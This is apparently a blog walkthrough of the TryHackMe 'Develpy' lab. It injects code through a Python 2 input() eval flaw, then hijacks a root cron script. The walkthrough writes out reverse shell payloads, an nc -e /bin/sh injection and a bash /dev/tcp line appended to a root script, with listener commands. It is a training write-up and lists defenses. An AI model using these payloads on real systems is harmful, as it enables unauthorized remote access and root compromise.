Login/Sign Up
Login/Sign Up

TryHackMe Develpy

5w0rdf15h4010

Comprehensive Guide to Exploiting Develpy: Python Vulnerabilities and Privilege Escalation

Welcome to this technical deep-dive into the TryHackMe: Develpy machine. This tutorial is designed for cybersecurity enthusiasts and ethical hackers who want to understand the dangers of insecure coding practices in Python and misconfigured automated tasks in Linux environments. We will walk through the entire lifecycle of a penetration test, from initial reconnaissance to gaining root privileges.

Extensive Introduction: The Intersection of Development and Security

In the modern DevOps era, Python has become the backbone of automation, rapid prototyping, and backend services. However, the ease of use provided by Python sometimes leads to a false sense of security among developers. The Develpy machine on TryHackMe is a quintessential example of how “shadow IT” or developer-centric environments can expose critical vulnerabilities. This machine focuses on a classic vulnerability found in older versions of Python: the insecure handling of user input.

Understanding these vulnerabilities is relevant today because many legacy systems still run Python 2.7, and even in modern Python 3 environments, similar logical flaws (like using eval() or exec()) persist. Furthermore, the privilege escalation path in this lab highlights the critical importance of the Principle of Least Privilege (PoLP). When developers leave scripts with excessive permissions or set up automated cron jobs without proper scoping, they create high-risk vectors for local privilege escalation. This tutorial aims to bridge the gap between secure coding and offensive security, providing the technical expertise needed to identify, exploit, and remediate these flaws.

Theoretical Concepts: Python Injections and Task Scheduling

To successfully compromise Develpy, we must understand two core theoretical pillars: Python Input Injection and Linux Cron Job Exploitation.

1. Python 2.x input() vs raw_input()

In Python 2, there is a fundamental security difference between these two functions. The raw_input() function reads a string from the user. However, the input() function essentially executes eval(raw_input()). This means that any string entered by the user is evaluated as a Python expression. If an attacker passes a library import command or a system call, the Python interpreter will execute it with the permissions of the running process. This is a textbook example of Remote Code Execution (RCE) via insecure deserialization/evaluation.

2. Linux Privilege Escalation via Cron Jobs

A cron job is a time-based job scheduler in Unix-like operating systems. System administrators use it to run scripts at specific intervals. Security risks arise when:

  • A script executed by root is world-writable.
  • A script imports a module from a directory where a low-privilege user can write files (Python Path Hijacking).
  • The cron configuration itself is editable by non-root users.

In Develpy, we will focus on identifying a script that is executed automatically and modifying its contents to spawn a root-level reverse shell.

Detailed Requirements

To follow this tutorial, you will need a standard penetration testing environment. I recommend Kali Linux or Parrot OS.

  • Nmap: For network discovery and port scanning.
  • Netcat (nc): For capturing reverse shells.
  • Python 3: To run local exploit scripts or HTTP servers.
  • TryHackMe VPN: Ensure you are connected to the THM network via OpenVPN.
  • Target Machine IP: This will be referred to as $IP throughout the guide.

To install these tools on a Debian-based system (if not already present), use:

sudo apt update && sudo apt install nmap netcat-traditional openvpn -y

Exhaustive Step-by-Step Guide

Step 1: Network Reconnaissance

First, we need to identify the open ports and services running on the target machine. We use Nmap with service detection (-sV) and default scripts (-sC).

nmap -sC -sV -p- $IP -oN nmap_scan.txt
Why: The -p- flag scans all 65,535 ports. We often find non-standard ports (like 10000) that host vulnerable internal applications.

Step 2: Service Interaction

From the scan, you will likely see Port 22 (SSH) and Port 10000. Port 10000 appears to be running a custom Python script. Let’s interact with it using Netcat.

nc $IP 10000

The service asks for input. Since it appears to be a Python “ping” or “calculation” script, we test for the input() vulnerability by entering a basic mathematical expression like 2+2. If it returns 4, it is evaluating our input.

Step 3: Exploiting the Python input() Vulnerability

Now that we know the service evaluates input, we can inject a Python payload to execute system commands. We will use the os module to spawn a shell. Enter the following when prompted for input:

__import__('os').system('nc -e /bin/sh YOUR_KALI_IP 4444')

Note: Ensure you have a listener running on your Kali machine: nc -lvnp 4444. Once executed, you will receive a reverse shell as the user king.

Step 4: Post-Exploitation Enumeration

Once inside, we need to find a way to escalate to root. We start by checking for scheduled tasks. Examine the /etc/crontab file or look for interesting files in the user’s home directory.

ls -la /home/king

You will notice two interesting files: root.sh and credentials.png. However, the most critical discovery is finding that there is a script being executed by root periodically. Check the processes using ps py or look for a file named root.sh that root executes.

Step 5: Privilege Escalation via Script Hijacking

We find that there is a file (e.g., root.sh or a similar automation script) that is executed by root every minute. If this script is writable by our current user, we can append a command to it. To verify writability, use:

ls -l /path/to/script.sh

If you have write permissions, append a reverse shell command to the end of the script:

echo "bash -i >& /dev/tcp/YOUR_KALI_IP/4445 0>&1" >> /path/to/script.sh

Open a new listener on your machine: nc -lvnp 4445. Wait for the cron job to trigger.

Step 6: Capturing the Root Flag

Once the cron job executes, your second listener will receive a connection. You are now root. Verify this with whoami. Now you can navigate to the /root directory and read the final flag.

cat /root/root.txt

Security & Ethical Section: Defense and Best Practices

Ethical hacking is a professional discipline governed by strict legal and moral frameworks. Activities described in this tutorial should only be performed on systems you own or have explicit written permission to test, such as TryHackMe labs. Unauthorized access to computer systems is a criminal offense globally (e.g., the Computer Fraud and Abuse Act in the US).

Defense Strategies:

  • Code Audit: Never use input() in Python 2.x. Use raw_input() and manually validate/sanitize data. In Python 3, input() behaves like raw_input(), but developers must still avoid eval().
  • Hardening Cron Jobs: Ensure that scripts executed by root are only writable by root. Use absolute paths within scripts to avoid path hijacking.
  • System Monitoring: Implement File Integrity Monitoring (FIM) to alert administrators when critical system scripts or crontabs are modified.
  • Least Privilege: Services should never run as root unless absolutely necessary. Use dedicated service accounts with restricted shell access.

FAQ (Frequently Asked Questions)

1. Why didn’t my reverse shell work in Step 3?

Check if your Kali IP is reachable from the target (VPN issues) and ensure that the port you chose (4444) isn’t being blocked by an outbound firewall on the target machine. Try using common ports like 80 or 443.

2. Is Python 2 still a threat in 2024?

Yes. Many industrial control systems, legacy enterprise applications, and “quick” internal scripts still rely on Python 2.7, making these vulnerabilities persistent in real-world audits.

3. How can I identify which user is running a cron job?

You can use a tool like pspy. It allows you to monitor processes in real-time without needing root permissions, helping you see which user executes which command periodically.

4. What is the difference between input() and eval()?

In Python 2, input() is practically eval(raw_input()). eval() interprets a string as a Python expression. Both are extremely dangerous if they handle untrusted user input.

5. Can I use a different payload for the Python injection?

Absolutely. You can use os.popen(), subprocess.call(), or even a pure Python reverse shell using the socket library if nc (Netcat) is not installed on the target.

This tutorial is for educational purposes only. Maintain your ethics and keep hacking for good!

Related Posts

Leave a Reply

Necessary cookies enable essential site features like secure log-ins and consent preference adjustments. They do not store personal data.
None
Functional cookies support features like content sharing on social media, collecting feedback, and enabling third-party tools.
None
Analytical cookies track visitor interactions, providing insights on metrics like visitor count, bounce rate, and traffic sources.
None
Advertisement cookies deliver personalized ads based on your previous visits and analyze the effectiveness of ad campaigns.
None